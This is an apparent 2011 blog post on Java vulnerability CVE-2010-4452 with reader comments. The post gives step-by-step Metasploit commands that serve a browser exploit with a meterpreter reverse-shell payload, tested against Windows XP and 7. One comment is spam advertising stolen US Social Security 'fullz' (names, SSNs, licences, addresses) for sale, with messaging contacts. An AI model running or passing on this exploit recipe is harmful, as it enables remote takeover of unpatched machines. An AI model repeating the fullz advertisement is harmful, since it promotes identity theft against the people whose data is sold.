Saturday, 30 April 2011
JAVA CVE-2010-4452
CVE: CVE-2010-4452
Remote: Yes
Local: No
Published: Feb 15 2011 12:00AM
Updated: Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in Java Runtime Environment.An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.This vulnerability affects the following supported versions:6 Update 23 and lower.
To exploit you can use the folloing systax on metasploit:
use windows/browser/java_codebase_trust
set SRVHOST 192.168.1.69
set SRVPORT 80
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.69
set LPORT 8888
exploit
Then open up the client browser and open the URL http://192.168.1.69/
You should get your shell!
I tested on windows XP and Windows 7, both worked fine, but it didn't worked on ubuntu.
Subscribe to:
Post Comments (Atom)
hi...
ReplyDeletei am Gaurav Garg From How To Hack A Computer
i like your web site or all available content but i like this post the most..
thanks for providing this information in this open way..
Regards
Gaurav garg
Keep Posting
Have A Nice day
Hello Everyone !
ReplyDeleteUSA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.
All SSN's are Tested & Verified.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
*Price for SSN lead $2
*You can ask for sample before any deal
*If you buy in bulk, will give you discount
*Sampling is just for serious buyers
->Hope for the long term business
->You can buy for your specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040